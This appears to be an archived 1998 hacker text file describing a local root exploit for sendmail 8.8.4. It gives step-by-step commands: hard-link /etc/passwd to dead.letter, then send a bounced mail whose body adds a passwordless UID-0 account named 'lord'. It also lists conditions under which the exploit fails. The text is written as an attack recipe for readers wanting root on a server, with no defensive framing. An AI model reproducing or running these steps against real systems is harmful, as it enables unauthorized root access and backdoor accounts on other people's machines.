home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hacks & Cracks
/
Hacks_and_Cracks.iso
/
hackersclub
/
km
/
library
/
hack
/
sm884.txt
< prev
next >
Wrap
Text File
|
1998-03-25
|
1KB
|
36 lines
sendmail8.8.4 exploit
"sendmail? 'tis the bugiest program" -phriend-
Ok, here's a brief and interesting explonation of this famous exploit. This
exploit uses sendmail version 8.8.4 and it requires that you have a shell
acount on the server in question. The exploit creates a link from
/etc/passwd to /var/tmp/dead.letter Very simple really. Here's how it
works, below are the exact commands as you have to type them (for the
technically challendged ones)
* ln /etc/passwd /var/tmp/dead.letter
* telnet target.host 25
* mail from: nonexsistent@not.an.actual.host.com
* rcpt to: nonexsistent@not.as.actual.host.com
* data
* lord::0:0:leet shit:/root:/bin/bash
* .
* quit
Kaboom, you're done, telnet to port 23 and log in as lord, no password
required. Thanx to a little bit of work we did, lord just happens to have
the same priviledges as root.
There are a couple of reasons why this might not work.
1. /var and / are different partitions (as you already know, you can't
make hard links between different partitions)
2. There is a postmaster account on a machine or mail alias, in which
case, your mail will end up there instead of being written to a
etc/passwd
3. /var/tmp doesn't exist or isn't publicly writable
Duncan Silver
www.hackersclub.com/uu